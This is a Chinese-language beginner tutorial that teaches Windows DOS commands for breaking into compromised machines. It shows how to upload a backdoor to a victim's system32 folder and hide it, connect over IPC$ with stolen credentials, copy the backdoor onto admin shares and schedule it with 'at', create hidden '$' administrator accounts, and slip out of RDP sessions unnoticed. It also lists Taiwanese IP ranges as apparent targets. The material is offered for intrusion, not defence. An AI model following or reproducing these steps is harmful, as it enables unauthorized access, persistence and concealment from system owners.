入门DOS命令

大家在入侵时,一定会用到DOS命令的,它的功能非常的强大.今天我就对常用的DOS命令作个详细的解说.主要是给刚入门者和接触DOS命令少的朋友看的.下面我挑几个比较常用的给大家说说.

以windows2000为例,windows xp类同.

DIR

显示当前盘下的所有文件夹和文件.

比较常用的方法是,你上传一个后门或服务端(这儿比如名字叫systems.exe)到肉鸡的c:\winnt\system32下,你想看看有没有上传成功.可以用DIR命令看一下. 命令如下 :

DIR c:\winnt\system32\systems.exe

则会显示:

2004-05-24 20:06 194,762 systems.exe

1 个文件 194,762 字节

0 个目录 4,658,597,888 可用字节

如果你没有上传成功,则显示如下:

驱动器 C 中的卷没有标签。

卷的序列号是 6458-3DB8

c:\winnt\system32\的目录

找不到文件

CD

改变当前目录

具体看一下下面的命令:

C:\>cd winnt //进入winnt文件夹

C:\winnt>cd system32 //进入system32 文件夹

C:\winnt\system32>cd.. //回到上一级目录

C:\winnt>cd..

C:\>

C:\>d: //进入D盘

D:\>e: //进入E盘

E:\>

del和deltree

DEL:删除文件.

看下面的命令:

C:\>del c:\xx\ww.txt //删除C盘的XX目录下的名叫WW的文件.

C:\>

C:\>del c:\xx\*.* //删除C盘的XX目录下所有文件

deltree

这个更具有破坏性,不但能删除所有文件,连文件夹也删除

C:\>deltree c:\winnt //删除C盘下的winnt所有文件和文件夹.

这个大家要小心使用.

attrid

显示和更改文件或文件夹属性.

文件或文件夹的属性有 隐藏,用字母H表示. 只读,用R表示. 存档,用A表示. 系统,用S表示

改变一个文件或文件夹属性, " + " 表示增加, " - ",表示去掉某个属性.

平时我们都把后门或服务端到上传肉鸡的c:\winnt\system32下.在进入了肉鸡的CMD以后,为了更加的不让肉鸡管理员知道,我们可以把你上传的隐藏起来.比如还是上面的systems.exe

命令如下:

C:\>attrid +h c:\winnt\system32\systems.exe //这样在system32下就找不到systems.exe

C:\>attrid -h c:\winnt\system32\systems.exe //去掉systems.exe的隐藏属性

copy

复制一个或多个文件到其它目录

比如你把C盘下一个叫1.txt文件复制到D盘的vv文件夹下,

C:\>copy c:\1.txt d:\vv\1.exe

比如你和肉鸡建立了IPC$连接(如何连接?以后会讲的),而且肉鸡开放了***享,这里比如开放了D盘.你可以把你C盘下的一个叫systems.exe的后门或服务端上传肉鸡的D盘下,命令如下:

C:\>copy c:\systems.exe \\肉鸡IP\d$

type

显示文件内容

我现在在我的C盘的XX目录下新建一个叫hack.txt的文件,内容是一些台湾的IP

命令如下:

C:\>type c:\xx\hack.txt

序号 开始IP地址 结束IP地址 国家/省/直辖市 城市/区县/组织

58 024.179.140.000 024.179.150.255 中国台湾省

80 061.013.000.000 061.013.255.255 中国台湾省

86 061.058.065.000 061.058.070.255 中国台湾省

87 061.059.160.000 061.059.255.255 中国台湾省

89 061.070.100.000 061.070.150.255 中国台湾省

1788 061.217.179.000 061.217.179.255 中国台湾省 台南市

1789 061.216.000.000 061.219.255.255 中国台湾省

1790 061.220.080.000 061.220.150.255 中国台湾省 台北市

1791 061.224.000.000 061.224.255.255 中国台湾省 台北市

1792 061.225.000.000 061.225.255.255 中国台湾省

3390 134.208.000.000 134.208.255.255 中国台湾省

3584 139.175.000.000 139.175.255.255 中国台湾省

3590 140.092.000.000 140.092.255.255 中国台湾省

3593 140.096.000.000 140.096.255.255 中国台湾省

3596 140.112.000.000 140.112.255.255 中国台湾省 台湾大学

C:\>

它还有一个用法,就是在进入肉鸡的CMD以后,看看肉鸡用的是什么操作系统,命令如下,在我电脑操作的结果如下:

C:\>type c:\boot.ini

[boot loader]

timeout=30

default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"

/fastdetect

看出来没有?,我用的是XP系统.

这是一些我认为常用的命令,其它的还有rd,md等.你们有兴趣可以找资料看看.平进比较少用.

ping

这个是用的最多的命令.可是现在好像不灵光了.大多数网站和个人电脑用防火墙屏蔽了ping.大多数时候根本是P不通.基本命令:

ping ip

ping 网址

下面P的是本站:

C:\>ping www.hf110.com

Pinging www.hf110.com [218.89.0.231] with 32 bytes of data:

Reply from 218.89.0.231: bytes=32 time=67ms TTL=116

Reply from 218.89.0.231: bytes=32 time=67ms TTL=116

Reply from 218.89.0.231: bytes=32 time=66ms TTL=116

Reply from 218.89.0.231: bytes=32 time=67ms TTL=116

Ping statistics for 218.89.0.231:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 66ms, Maximum = 67ms, Average = 66ms

上面P出本站的IP是218.89.0.231,从TTL=116.大略看出使用的是windows操作系统.一般来说TTL值在128左右的是windows操作系统,值在225左右的,大多数是unix类系统.但是还有特殊情况,管理员可能会通过改注册表来修改TTL值.

net use

在得到肉鸡的用户名和密码这后,可以用这个命令做IPC$连接

net use \\肉鸡ip\ipc$ "密码" /user:"用户名"

连接成功后,上传后门或服务端,(比如叫systems.exe,在你的D盘下).

copy D:\systems.exe \\肉鸡ip\c$ //这里它要开放***享,你才能上传.否则无法上传成功.

net time \\肉鸡ip //看一下肉鸡的时间,是24小时制.比如这儿是下午3点10分.写作15:10

at \\肉鸡ip 15:12 systems.exe //在15:12分,运行systems.exe

在这儿,你上传的是反弹木马的话,可以等着它来连接你.其实在入侵过程中,有很多的偶然性,比如上面的,你可以IPC连接成功.但是并一定能够通过net time \\肉鸡ip ,看肉鸡时间.就算能看到时间吧,有时肉鸡的at服务并没有打开.就算打开了,但是后门或服务端不一定能够有机会运行,

可能被杀毒软件查杀.所以在入侵过程中,失败是常有的事.这个方法不行,可以另一种.

net user

查看用户或新建一个用户.

这是在我电脑上的截图

C:\>net user

\\BILLGATES 的用户帐户

---------------------------------------------------------------------

Guest guest1 HelpAssistant

SUPPORT_388945a0 yhkj

命令成功完成。

C:\>

上面是我所有的用户.

现在我新建一个setwell的用户,密码是123456, 截图如下

C:\>net user setwell 123456 /add

命令成功完成。

C:\>net localgroup administrators setwell /add //这条命令是加setwell为管理员

命令成功完成。

接下来我们再net user ,载图如下

C:\>net user

\\BILLGATES 的用户帐户

----------------------------------------------------------------

Guest guest1 HelpAssistant

setwell SUPPORT_388945a0 yhkj

命令成功完成。

建立的用户可以用net user命令看到,我们在用户后面加个$,可以小小的隐藏一下.这次建一个叫set的用户,截图如下:

C:\>net user set$ 123456 /add

命令成功完成。

C:\>net localgroup administrators set$ /add

命令成功完成。

C:\>net user

\\BILLGATES 的用户帐户

-----------------------------------------------------------------

Guest guest1 HelpAssistant

setwell SUPPORT_388945a0 yhkj

命令成功完成。

C:\>

看到没有,我们没有看到刚才建立的用户set$,可以用这个命令看,net localgroup administrators ,这个命令的是显示所有的管理员,截图如下:

C:\>net localgroup administrators

别名 administrators

注释 管理员对计算机/域有不受限制的完全访问权

成员

------------------------------------------------------

guest1

set$

setwell

yhkj

命令成功完成。

C:\>

看到没有,我们看到set$这个用户了.

如果要删除用户用这个命令:

C:\>net user setwell /delete

net start

1.启动某些服务

比如: net start telnet //启动telnet服务

2.查看当前启动了什么服务.看看我的电脑启动了什么服务:

C:\>net start

已经启动以下 Windows 服务:

Automatic Updates

COM+ Event System

Cryptographic Services

DHCP Client

Distributed Link Tracking Client

DNS Client

Error Reporting Service

Event Log

Help and Support

IPSEC Services

Logical Disk Manager

Messenger

这只是一部分服务.

net stop

停止某些服务.站长今天也说到了.我不多了.

net share

查看默认***享.也就是查看这些***享C$ D$ e$ f$ admin$ ipc$,这是系统默认的.我的全部关了,我

到肉鸡上截张图吧.

C:\Documents and Settings\Administrator>net share

D$ D:\ 默认***享

F$ F:\ 默认***享

ADMIN$ C:\WINNT 远程管理

C$ C:\ 默认***享

E$ E:\ 默认***享

命令成功完成。

C:\Documents and Settings\Administrator>

这个肉鸡的IPC$***享竟然关了.

net view

也是查看***享,但不是上面的默认***享了,还是来张截图吧.也是肉鸡的,

C:\Documents and Settings\Administrator>net view

服务器名称 注释

-------------------------------------------------------------------------------

\\17

\\HMZ

\\ZGH

命令成功完成。

C:\Documents and Settings\Administrator>

学DOS命令看起来有点烦,其实是挺容易学的.而且学好了,在入侵中,会起到举足轻重的作用.下次讲netstat 等命令.

netstat -an

使用这个命令可以察看到和本机的所有的连接.看一下在我电脑上的截图,

D:\>netstat -an

Active Connections

Proto Local Address Foreign Address State

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING

TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING

TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING

TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING

TCP 180.254.158.42:139 0.0.0.0:0 LISTENING

TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED

UDP 0.0.0.0:500 *:*

UDP 0.0.0.0:1035 *:*

UDP 0.0.0.0:1037 *:*

UDP 0.0.0.0:1134 *:*

UDP 0.0.0.0:1136 *:*

Proto Local Address Foreign Address State

协议 本地端口及IP地址 远程端口及IP地址 状态

LISTENING 监听状态 表示等待对方连接

ESTABLISHED 正在连接着.

TCP 协议是TCP

UDP 协议是UDP

TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED

这个表示 利用tcp协议 本机ip(218.95.49.187通过端口:2935 和远程ip(218.89.0.231)端口:80连接

query

这个命令只有在开了3389端口(也不一定端口是3389,说不定改成别的端口了.严格讲应是开了远程终端服务)的机子,才能用上.我用1$的用户名上了一台3389机子,看一下截图:

c:\>query user

USERNAME SESSIONNAME ID STATE

administrator console 0 运行中

1$ rdp-tcp#2 1 运行中

看到上面没有,管理员也在,如果你要退出的话,就用如下命令:

logoff ID 这儿是logoff 1.

这是正常退出的.说到退出,还有一个办法,就是在开始---关机---注销1$.如果你用另外的方法退出的话,那么肉鸡在关机时,会出现类如"有一个其它客人登录到这台服务器,如果你退出,对方的会话数据会丢失"一类的话.这样管理员就会发现了.